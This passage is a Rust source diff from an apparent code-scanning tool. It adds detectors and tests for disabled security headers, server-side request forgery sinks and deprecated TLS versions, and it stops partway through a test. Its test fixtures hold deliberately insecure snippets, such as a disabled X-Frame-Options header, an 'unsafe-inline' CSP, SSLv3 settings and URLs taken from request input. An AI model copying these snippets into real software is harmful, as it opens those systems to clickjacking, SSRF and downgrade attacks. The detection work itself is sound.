pub fn new() -> Self {
Self {
// Explicit header disabled in various formats
header_disabled: Regex::new(
r#"(?i)(?:X-Frame-Options|X-Content-Type-Options|X-XSS-Protection)\s*[:=]\s*["']?(?:none|disabled?|false|off)["']?"#,
)
.expect("valid regex"),
// Django missing secure settings
django_missing: Regex::new(
r#"(?i)SECURE_(?:BROWSER_XSS_FILTER|CONTENT_TYPE_NOSNIFF|HSTS_SECONDS|SSL_REDIRECT)\s*=\s*(?:False|0)"#,
)
.expect("valid regex"),
// YAML headers disabled
yaml_disabled: Regex::new(
r#"(?i)(?:x_frame_options|xss_protection|content_type_nosniff|hsts)\s*:\s*(?:false|no|disabled?|off)"#,
)
.expect("valid regex"),
// Frame options ALLOWALL (dangerous)
frame_allowall: Regex::new(r#"(?i)X-Frame-Options\s*[:=]\s*["']?ALLOWALL"#)
.expect("valid regex"),
// CSP disabled or using unsafe-inline/unsafe-eval
csp_unsafe: Regex::new(
r#"(?i)(?:Content-Security-Policy|CSP)\s*[:=]\s*["']?(?:none|disabled?|.*unsafe-(?:inline|eval))"#,
)
.expect("valid regex"),
// HSTS disabled or set to 0
hsts_disabled: Regex::new(
r#"(?i)(?:Strict-Transport-Security|HSTS|hsts_seconds)\s*[:=]\s*(?:["']?(?:none|disabled?|false|off)["']?|0)"#,
)
.expect("valid regex"),
}
}
fn make_claim(
path_segments: &[String],
file: &str,
line: usize,
matched: &str,
header: &str,
description: &str,
) -> ExtractedClaim {
build_claim(
path_segments,
&["http", "security_headers", header],
"header_status",
ObjectValue::Text("disabled".to_string()),
file,
line,
matched,
0.8,
description,
)
}
}
impl Extractor for SecurityHeadersExtractor {
fn name(&self) -> &str {
"security_headers"
}
fn languages(&self) -> &[Language] {
&[
Language::Python,
Language::JavaScript,
Language::TypeScript,
Language::Go,
Language::Yaml,
Language::Json,
Language::Toml,
]
}
fn extract(
&self,
path_segments: &[String],
content: &str,
_language: Language,
file: &str,
) -> Vec<ExtractedClaim> {
let mut claims = Vec::new();
for (line_idx, line) in content.lines().enumerate() {
let line_num = line_idx + 1;
// Check for explicitly disabled headers
if let Some(m) = self.header_disabled.find(line) {
let header = if line.to_lowercase().contains("frame") {
"x_frame_options"
} else if line.to_lowercase().contains("content-type") {
"x_content_type_options"
} else {
"x_xss_protection"
};
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
header,
"Security header explicitly disabled",
));
}
// Check Django secure settings
if let Some(m) = self.django_missing.find(line) {
let header = if line.to_lowercase().contains("xss") {
"x_xss_protection"
} else if line.to_lowercase().contains("nosniff") {
"x_content_type_options"
} else if line.to_lowercase().contains("hsts") {
"hsts"
} else {
"ssl_redirect"
};
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
header,
"Django security setting disabled",
));
}
// Check YAML disabled patterns
if let Some(m) = self.yaml_disabled.find(line) {
let header = if line.to_lowercase().contains("frame") {
"x_frame_options"
} else if line.to_lowercase().contains("xss") {
"x_xss_protection"
} else if line.to_lowercase().contains("nosniff") {
"x_content_type_options"
} else {
"hsts"
};
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
header,
"Security header disabled in configuration",
));
}
// Check for dangerous X-Frame-Options ALLOWALL
if let Some(m) = self.frame_allowall.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"x_frame_options",
"X-Frame-Options set to ALLOWALL (clickjacking risk)",
));
}
// Check for CSP unsafe patterns
if let Some(m) = self.csp_unsafe.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"content_security_policy",
"Content-Security-Policy disabled or uses unsafe directives",
));
}
// Check for HSTS disabled
if let Some(m) = self.hsts_disabled.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"hsts",
"Strict-Transport-Security (HSTS) disabled",
));
}
}
claims
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_header_disabled() {
let extractor = SecurityHeadersExtractor::new();
let content = r#"
X-Frame-Options: none
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "nginx.conf");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("security_headers"));
}
#[test]
fn test_django_missing() {
let extractor = SecurityHeadersExtractor::new();
let content = r#"
SECURE_BROWSER_XSS_FILTER = False
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "settings.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("Django"));
}
#[test]
fn test_yaml_disabled() {
let extractor = SecurityHeadersExtractor::new();
let content = r#"
x_frame_options: false
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_frame_allowall() {
let extractor = SecurityHeadersExtractor::new();
let content = r#"
X-Frame-Options = "ALLOWALL"
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Toml, "config.toml");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("clickjacking"));
}
#[test]
fn test_csp_unsafe() {
let extractor = SecurityHeadersExtractor::new();
let content = r#"
Content-Security-Policy: script-src 'unsafe-inline'
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("content_security_policy"));
}
#[test]
fn test_hsts_disabled() {
let extractor = SecurityHeadersExtractor::new();
let content = r#"
Strict-Transport-Security: none
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("hsts"));
}
#[test]
fn test_hsts_zero() {
let extractor = SecurityHeadersExtractor::new();
let content = r#"
HSTS_SECONDS = 0
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "settings.py");
// Should detect hsts_disabled pattern (HSTS = 0)
assert_eq!(claims.len(), 1);
}
#[test]
fn test_no_false_positives_enabled() {
let extractor = SecurityHeadersExtractor::new();
// Safe: headers enabled
let content = r#"
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
SECURE_BROWSER_XSS_FILTER = True
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
assert!(claims.is_empty());
}
}

View File

@ -0,0 +1,393 @@
//! Server-Side Request Forgery (SSRF) vulnerability extractor.
//!
//! Detects patterns where HTTP requests are made with user-controlled URLs,
//! which can allow attackers to access internal services or exfiltrate data.
use regex::Regex;
use stemedb_core::types::ObjectValue;
use super::traits::{build_claim, Extractor};
use crate::types::{ExtractedClaim, Language};
/// Extractor for SSRF vulnerabilities.
///
/// Detects patterns indicating unsafe URL handling in HTTP requests:
/// - HTTP clients (requests, fetch, axios, reqwest) with user-controlled URLs
/// - Webhook/callback URLs from user input
/// - Image/proxy URLs from request parameters
pub struct SsrfExtractor {
// Python patterns
python_requests: Regex,
python_urllib: Regex,
python_httpx: Regex,
// JavaScript/TypeScript patterns
js_fetch: Regex,
js_axios: Regex,
js_got: Regex,
// Go patterns
go_http: Regex,
// Rust patterns
rust_reqwest: Regex,
// Common sink patterns (all languages)
ssrf_sink: Regex,
}
impl Default for SsrfExtractor {
fn default() -> Self {
Self::new()
}
}
impl SsrfExtractor {
/// Create a new SSRF extractor with compiled regexes.
///
/// # Panics
/// Panics if any regex pattern is invalid (programmer error).
#[allow(clippy::expect_used)]
pub fn new() -> Self {
Self {
// Python: requests with user URL
python_requests: Regex::new(
r#"requests\.(?:get|post|put|delete|head|patch|request)\s*\(\s*(?:url|uri|target|endpoint|request\.)"#,
)
.expect("valid regex"),
python_urllib: Regex::new(
r#"urllib\.request\.(?:urlopen|Request)\s*\(\s*(?:url|uri|request\.)"#,
)
.expect("valid regex"),
python_httpx: Regex::new(
r#"httpx\.(?:get|post|put|delete|AsyncClient)\s*\([^)]*(?:url|uri|request\.)"#,
)
.expect("valid regex"),
// JavaScript: fetch with user URL
js_fetch: Regex::new(
r#"fetch\s*\(\s*(?:url|uri|target|endpoint|req\.(?:query|params|body)\.)"#,
)
.expect("valid regex"),
js_axios: Regex::new(
r#"axios\.(?:get|post|put|delete|request)\s*\(\s*(?:url|uri|target|endpoint)"#,
)
.expect("valid regex"),
js_got: Regex::new(
r#"got\s*\(\s*(?:url|uri|target|endpoint)"#,
)
.expect("valid regex"),
// Go: http.Get with user URL
go_http: Regex::new(
r#"http\.(?:Get|Post|Head|PostForm|NewRequest)\s*\(\s*(?:url|uri|target|endpoint|r\.)"#,
)
.expect("valid regex"),
// Rust: reqwest with user URL
rust_reqwest: Regex::new(
r#"reqwest::(?:get|Client).*\(\s*(?:url|&url|format!|user)"#,
)
.expect("valid regex"),
// Common sink patterns - URLs that look user-controlled
ssrf_sink: Regex::new(
r#"(?i)(?:proxy_url|image_url|webhook_url|callback_url|redirect_url|target_url|remote_url|external_url)\s*[:=]\s*(?:request\.|params\.|req\.Query)"#,
)
.expect("valid regex"),
}
}
fn make_claim(
path_segments: &[String],
file: &str,
line: usize,
matched: &str,
category: &str,
description: &str,
) -> ExtractedClaim {
build_claim(
path_segments,
&["network", "ssrf", category],
"request_url_source",
ObjectValue::Text("user_controlled".to_string()),
file,
line,
matched,
0.85,
description,
)
}
}
impl Extractor for SsrfExtractor {
fn name(&self) -> &str {
"ssrf"
}
fn languages(&self) -> &[Language] {
&[
Language::Python,
Language::JavaScript,
Language::TypeScript,
Language::Go,
Language::Rust,
]
}
fn extract(
&self,
path_segments: &[String],
content: &str,
language: Language,
file: &str,
) -> Vec<ExtractedClaim> {
let mut claims = Vec::new();
for (line_idx, line) in content.lines().enumerate() {
let line_num = line_idx + 1;
// Check for common sink patterns (all languages)
if let Some(m) = self.ssrf_sink.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"url_sink",
"URL variable populated from user input (SSRF risk)",
));
}
// Language-specific patterns
match language {
Language::Python => {
if let Some(m) = self.python_requests.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"http_client",
"requests library with user-controlled URL (SSRF risk)",
));
}
if let Some(m) = self.python_urllib.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"http_client",
"urllib with user-controlled URL (SSRF risk)",
));
}
if let Some(m) = self.python_httpx.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"http_client",
"httpx with user-controlled URL (SSRF risk)",
));
}
}
Language::JavaScript | Language::TypeScript => {
if let Some(m) = self.js_fetch.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"http_client",
"fetch with user-controlled URL (SSRF risk)",
));
}
if let Some(m) = self.js_axios.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"http_client",
"axios with user-controlled URL (SSRF risk)",
));
}
if let Some(m) = self.js_got.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"http_client",
"got with user-controlled URL (SSRF risk)",
));
}
}
Language::Go => {
if let Some(m) = self.go_http.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"http_client",
"http.Get/Post with user-controlled URL (SSRF risk)",
));
}
}
Language::Rust => {
if let Some(m) = self.rust_reqwest.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"http_client",
"reqwest with user-controlled URL (SSRF risk)",
));
}
}
_ => {}
}
}
claims
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_python_requests() {
let extractor = SsrfExtractor::new();
let content = r#"
response = requests.get(url)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "api.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("network/ssrf"));
}
#[test]
fn test_python_requests_user_input() {
let extractor = SsrfExtractor::new();
let content = r#"
response = requests.post(request.json['webhook_url'], data=payload)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "webhook.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_python_urllib() {
let extractor = SsrfExtractor::new();
let content = r#"
data = urllib.request.urlopen(url).read()
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "fetch.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_js_fetch() {
let extractor = SsrfExtractor::new();
let content = r#"
const data = await fetch(url);
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "api.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_js_axios() {
let extractor = SsrfExtractor::new();
let content = r#"
const response = await axios.get(url);
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "api.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_go_http() {
let extractor = SsrfExtractor::new();
let content = r#"
resp, err := http.Get(url)
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "client.go");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_rust_reqwest() {
let extractor = SsrfExtractor::new();
let content = r#"
let body = reqwest::get(url).await?.text().await?;
"#;
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "client.rs");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_ssrf_sink_pattern() {
let extractor = SsrfExtractor::new();
let content = r#"
proxy_url = req.Query("proxy")
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "proxy.go");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("URL variable"));
}
#[test]
fn test_webhook_url_sink() {
let extractor = SsrfExtractor::new();
let content = r#"
webhook_url = request.json.get('callback')
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "webhook.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_no_false_positives_hardcoded() {
let extractor = SsrfExtractor::new();
// Safe: hardcoded URL
let content = r#"
response = requests.get("https://api.example.com/data")
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "api.py");
assert!(claims.is_empty());
}
}

View File

@ -37,6 +37,18 @@ pub struct TlsVersionExtractor {
// Config file patterns (YAML, TOML, JSON)
config_min_version: Regex,
// Semantic patterns (variable name suggests TLS + value is deprecated)
semantic_tls_version: Regex,
// Environment variable patterns
env_tls_version: Regex,
// Terraform HCL patterns
terraform_tls: Regex,
// Kubernetes camelCase patterns (YAML)
k8s_tls: Regex,
}
impl Default for TlsVersionExtractor {
@ -89,6 +101,40 @@ impl TlsVersionExtractor {
r#"(?i)(?:min_version|tls_min_version|minimum_tls_version|ssl_min_version)\s*[:=]\s*["']?(?:1\.[01]|TLSv?1(?:\.[01])?|SSL(?:v?3)?|TLS10|TLS11)["']?"#,
)
.expect("valid regex"),
// Semantic: variable name contains tls/ssl and min/version in any order
// Covers common patterns: TLS_MIN_VERSION, MIN_TLS_VERSION, SSL_VERSION, sslVersion, tlsMinVersion
// Pattern 1: (tls|ssl) followed by min/version (e.g., TLS_MIN_VERSION, ssl_version)
// Pattern 2: (min|version) followed by tls/ssl (e.g., MIN_TLS, VERSION_SSL)
// Pattern 3: camelCase (e.g., sslVersion, tlsMinVersion, minTlsVersion)
// Value must be terminated by quote, end of word, or end of line to avoid matching "TLS1_2" as "TLS1"
// Allow optional type annotations (e.g., Rust `: &str`) between name and value
semantic_tls_version: Regex::new(
r#"(?i)\b(?:(?:tls|ssl)[_A-Z]*(?:min(?:imum)?|version)|(?:min(?:imum)?|version)[_A-Z]*(?:tls|ssl)|(?:tls|ssl)[A-Z][a-z]*(?:Version|Min)|(?:min|version)[A-Z][a-z]*(?:Tls|Ssl))\w*(?:\s*:\s*[^=]+)?\s*=\s*["']?(1\.[01]|TLSv?1(?:\.[01])?|SSL(?:v?[23])?)(?:["'\s;]|$)"#,
)
.expect("valid regex"),
// Environment variables (NAME=value, with optional export)
// Catches: TLS_MIN_VERSION=1.0, export SSL_VERSION=TLSv1
env_tls_version: Regex::new(
r#"(?i)^(?:export\s+)?(\w*(?:tls|ssl)\w*(?:_?(?:min|version))+\w*)\s*=\s*["']?(1\.[01]|TLSv?1(?:\.[01])?|SSL(?:v?[23])?)["']?\s*$"#,
)
.expect("valid regex"),
// Terraform HCL patterns
// Catches: min_tls_version = "TLS1_0", ssl_minimum_protocol_version = "TLSv1"
// The value must be a complete deprecated version - use word boundary or quote/end
terraform_tls: Regex::new(
r#"(?i)(?:min(?:imum)?_)?(?:tls|ssl)(?:_(?:protocol_)?)?version\s*=\s*["']?(?:TLS_?1_?[01]|TLSv1(?:\.[01])?|1\.[01]|SSL(?:v?[23])?)(?:["'\s]|$)"#,
)
.expect("valid regex"),
// Kubernetes camelCase patterns (YAML)
// Catches: minTLSVersion: VersionTLS10, tlsMinVersion: "1.0"
k8s_tls: Regex::new(
r#"(?i)(?:min)?(?:tls|ssl)(?:Min)?(?:Version|Protocol)\s*:\s*["']?(?:VersionTLS1[01]|VersionSSL30|TLSv?1(?:\.[01])?|1\.[01]|SSL(?:v?[23])?)["']?"#,
)
.expect("valid regex"),
}
}
@ -141,6 +187,8 @@ impl Extractor for TlsVersionExtractor {
Language::Yaml,
Language::Toml,
Language::Json,
Language::Terraform,
Language::Dotenv,
]
}
@ -267,214 +315,56 @@ impl Extractor for TlsVersionExtractor {
"deprecated",
"Deprecated TLS version in configuration (RFC 8996)",
));
// Kubernetes camelCase patterns for YAML
if language == Language::Yaml {
claims.extend(self.check_pattern(
content,
&self.k8s_tls,
path_segments,
file,
"deprecated",
"Kubernetes minTLSVersion set to deprecated value (RFC 8996)",
));
}
}
Language::Terraform => {
claims.extend(self.check_pattern(
content,
&self.terraform_tls,
path_segments,
file,
"deprecated",
"Terraform TLS configuration uses deprecated version (RFC 8996)",
));
}
Language::Dotenv => {
claims.extend(self.check_pattern(
content,
&self.env_tls_version,
path_segments,
file,
"deprecated",
"Environment variable sets deprecated TLS version (RFC 8996)",
));
}
_ => {}
}
// Apply semantic pattern to all languages (cross-language)
// This catches patterns like: const TLS_MIN_VERSION = "1.0"
claims.extend(self.check_pattern(
content,
&self.semantic_tls_version,
path_segments,
file,
"deprecated",
"Semantic: Variable name suggests TLS version, value is deprecated (RFC 8996)",
));
claims
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_rust_tls10_detection() {
let extractor = TlsVersionExtractor::new();
// Content with TLS10 on two lines - should find 2 matches
let content = r#"
use rustls::version::TLS10;
config.min_protocol_version = Some(TLS10);
"#;
let claims =
extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");
// Both lines match TLS10 pattern
assert_eq!(claims.len(), 2);
assert!(claims.iter().all(|c| c.value == ObjectValue::Text("1.0".to_string())));
}
#[test]
fn test_rust_tls11_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
let version = TLS1_1;
"#;
let claims =
extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("1.1".to_string()));
}
#[test]
fn test_go_version_tls10_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
cfg := &tls.Config{
MinVersion: tls.VersionTLS10,
}
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("1.0".to_string()));
}
#[test]
fn test_go_version_tls11_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
cfg := &tls.Config{
MinVersion: tls.VersionTLS11,
}
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("1.1".to_string()));
}
#[test]
fn test_python_tls_version_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
import ssl
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "server.py");
// Should detect both TLSv1 and TLSv1_1
assert_eq!(claims.len(), 2);
}
#[test]
fn test_js_min_version_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
const server = https.createServer({
minVersion: 'TLSv1',
key: fs.readFileSync('key.pem')
});
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "server.js");
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("1.0".to_string()));
}
#[test]
fn test_js_secure_protocol_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
const options = {
secureProtocol: 'TLSv1_method'
};
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "client.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_yaml_min_version_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
tls:
min_version: "1.0"
cert_file: /etc/certs/server.crt
"#;
let claims = extractor.extract(
&["config".to_string()],
content,
Language::Yaml,
"config/production.yaml",
);
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("deprecated".to_string()));
}
#[test]
fn test_yaml_tls_min_version_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
server:
tls_min_version: TLSv1.1
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_no_false_positives_tls12() {
let extractor = TlsVersionExtractor::new();
let content = r#"
cfg := &tls.Config{
MinVersion: tls.VersionTLS12,
}
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
assert!(claims.is_empty());
}
#[test]
fn test_no_false_positives_tls13() {
let extractor = TlsVersionExtractor::new();
let content = r#"
use rustls::version::TLS13;
config.min_protocol_version = Some(TLS13);
"#;
let claims =
extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");
assert!(claims.is_empty());
}
#[test]
fn test_no_false_positives_modern_config() {
let extractor = TlsVersionExtractor::new();
let content = r#"
tls:
min_version: "1.2"
max_version: "1.3"
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
assert!(claims.is_empty());
}
#[test]
fn test_concept_path_structure() {
let extractor = TlsVersionExtractor::new();
let content = r#"
cfg := &tls.Config{MinVersion: tls.VersionTLS10}
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("tls/min_version"));
}
}
#[path = "tls_version_tests.rs"]
mod tests;

View File

@ -0,0 +1,362 @@
//! Tests for TLS version extractor.
use super::tls_version::TlsVersionExtractor;
use super::Extractor;
use crate::types::Language;
use stemedb_core::types::ObjectValue;
#[test]
fn test_rust_tls10_detection() {
let extractor = TlsVersionExtractor::new();
// Content with TLS10 on two lines - should find 2 matches
let content = r#"
use rustls::version::TLS10;
config.min_protocol_version = Some(TLS10);
"#;
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");
// Both lines match TLS10 pattern
assert_eq!(claims.len(), 2);
assert!(claims.iter().all(|c| c.value == ObjectValue::Text("1.0".to_string())));
}
#[test]
fn test_rust_tls11_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
let version = TLS1_1;
"#;
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("1.1".to_string()));
}
#[test]
fn test_go_version_tls10_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
cfg := &tls.Config{
MinVersion: tls.VersionTLS10,
}
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("1.0".to_string()));
}
#[test]
fn test_go_version_tls11_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
cfg := &tls.Config{
MinVersion: tls.VersionTLS11,
}
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("1.1".to_string()));
}
#[test]
fn test_python_tls_version_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
import ssl
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
"#;
let claims = extractor.extract(&["python".to_string()], content, Language::Python, "server.py");
// Should detect both TLSv1 and TLSv1_1
assert_eq!(claims.len(), 2);
}
#[test]
fn test_js_min_version_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
const server = https.createServer({
minVersion: 'TLSv1',
key: fs.readFileSync('key.pem')
});
"#;
let claims = extractor.extract(&["js".to_string()], content, Language::JavaScript, "server.js");
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("1.0".to_string()));
}
#[test]
fn test_js_secure_protocol_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
const options = {
secureProtocol: 'TLSv1_method'
};
"#;
let claims = extractor.extract(&["js".to_string()], content, Language::JavaScript, "client.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_yaml_min_version_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
tls:
min_version: "1.0"
cert_file: /etc/certs/server.crt
"#;
let claims = extractor.extract(
&["config".to_string()],
content,
Language::Yaml,
"config/production.yaml",
);
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("deprecated".to_string()));
}
#[test]
fn test_yaml_tls_min_version_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
server:
tls_min_version: TLSv1.1
"#;
let claims = extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
// May match both config pattern and semantic pattern
assert!(!claims.is_empty());
assert!(claims.iter().any(|c| c.value == ObjectValue::Text("deprecated".to_string())));
}
#[test]
fn test_no_false_positives_tls12() {
let extractor = TlsVersionExtractor::new();
let content = r#"
cfg := &tls.Config{
MinVersion: tls.VersionTLS12,
}
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
assert!(claims.is_empty());
}
#[test]
fn test_no_false_positives_tls13() {
let extractor = TlsVersionExtractor::new();
let content = r#"
use rustls::version::TLS13;
config.min_protocol_version = Some(TLS13);
"#;
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");
assert!(claims.is_empty());
}
#[test]
fn test_no_false_positives_modern_config() {
let extractor = TlsVersionExtractor::new();
let content = r#"
tls:
min_version: "1.2"
max_version: "1.3"
"#;
let claims = extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
assert!(claims.is_empty());
}
#[test]
fn test_concept_path_structure() {
let extractor = TlsVersionExtractor::new();
let content = r#"
cfg := &tls.Config{MinVersion: tls.VersionTLS10}
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("tls/min_version"));
}
// ===== Phase 8.4: Semantic TLS Version Detection Tests =====
#[test]
fn test_semantic_const_rust() {
let extractor = TlsVersionExtractor::new();
let content = r#"const TLS_MIN_VERSION: &str = "1.0";"#;
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/config.rs");
assert!(!claims.is_empty());
assert!(claims.iter().any(|c| c.description.contains("Semantic")));
}
#[test]
fn test_semantic_let_js() {
let extractor = TlsVersionExtractor::new();
let content = r#"let sslVersion = "TLSv1";"#;
let claims = extractor.extract(&["js".to_string()], content, Language::JavaScript, "config.js");
assert!(!claims.is_empty());
assert!(claims.iter().any(|c| c.description.contains("Semantic")));
}
#[test]
fn test_semantic_assignment_python() {
let extractor = TlsVersionExtractor::new();
let content = r#"TLS_MINIMUM_VERSION = "1.1""#;
let claims = extractor.extract(&["python".to_string()], content, Language::Python, "config.py");
assert!(!claims.is_empty());
assert!(claims.iter().any(|c| c.description.contains("Semantic")));
}
#[test]
fn test_semantic_ssl_version() {
let extractor = TlsVersionExtractor::new();
let content = r#"const SSL_VERSION = "SSLv3";"#;
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/ssl.rs");
assert!(!claims.is_empty());
}
#[test]
fn test_env_tls_version() {
let extractor = TlsVersionExtractor::new();
let content = "TLS_MIN_VERSION=1.0";
let claims = extractor.extract(&["env".to_string()], content, Language::Dotenv, ".env");
assert!(!claims.is_empty());
assert!(claims.iter().any(|c| c.description.contains("Environment variable")));
}
#[test]
fn test_env_export_ssl() {
let extractor = TlsVersionExtractor::new();
let content = "export SSL_VERSION=TLSv1";
let claims =
extractor.extract(&["env".to_string()], content, Language::Dotenv, ".env.production");
assert!(!claims.is_empty());
}
#[test]
fn test_terraform_min_tls_version() {
let extractor = TlsVersionExtractor::new();
let content = r#"min_tls_version = "TLS1_0""#;
let claims =
extractor.extract(&["terraform".to_string()], content, Language::Terraform, "main.tf");
assert!(!claims.is_empty());
assert!(claims.iter().any(|c| c.description.contains("Terraform")));
}
#[test]
fn test_terraform_ssl_version() {
let extractor = TlsVersionExtractor::new();
let content = r#"ssl_minimum_protocol_version = "TLSv1""#;
let claims =
extractor.extract(&["terraform".to_string()], content, Language::Terraform, "variables.tf");
assert!(!claims.is_empty());
}
#[test]
fn test_k8s_min_tls_version() {
let extractor = TlsVersionExtractor::new();
let content = r#"
apiVersion: v1
kind: Config
spec:
minTLSVersion: VersionTLS10
"#;
let claims =
extractor.extract(&["k8s".to_string()], content, Language::Yaml, "deployment.yaml");
assert!(!claims.is_empty());
assert!(claims.iter().any(|c| c.description.contains("Kubernetes")));
}
#[test]
fn test_k8s_tls_min_version_camel() {
let extractor = TlsVersionExtractor::new();
let content = r#"tlsMinVersion: "1.0""#;
let claims = extractor.extract(&["k8s".to_string()], content, Language::Yaml, "ingress.yaml");
assert!(!claims.is_empty());
}
#[test]
fn test_no_false_positive_semantic_tls12() {
let extractor = TlsVersionExtractor::new();
